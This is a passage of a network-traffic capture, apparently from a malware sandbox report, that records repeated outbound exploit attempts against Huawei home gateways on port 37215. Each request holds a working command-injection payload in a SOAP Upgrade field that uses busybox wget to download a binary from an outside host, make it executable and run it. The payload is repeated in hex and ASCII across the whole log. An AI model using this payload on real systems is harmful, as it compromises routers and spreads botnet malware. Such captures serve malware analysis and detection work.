2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1813192.168.2.154282241.220.6.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465595007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1814192.168.2.154139041.34.85.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465616941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1815192.168.2.153524841.198.185.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465648890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1816192.168.2.154815041.182.92.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465662956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1817192.168.2.154274241.89.146.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465679884 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1818192.168.2.154036041.18.166.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465686083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1819192.168.2.155005241.44.250.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465734005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1820192.168.2.155733841.162.114.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465734959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1821192.168.2.153773641.50.19.22437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465748072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1822192.168.2.155029641.59.99.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465761900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1823192.168.2.153861241.133.139.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.465779066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
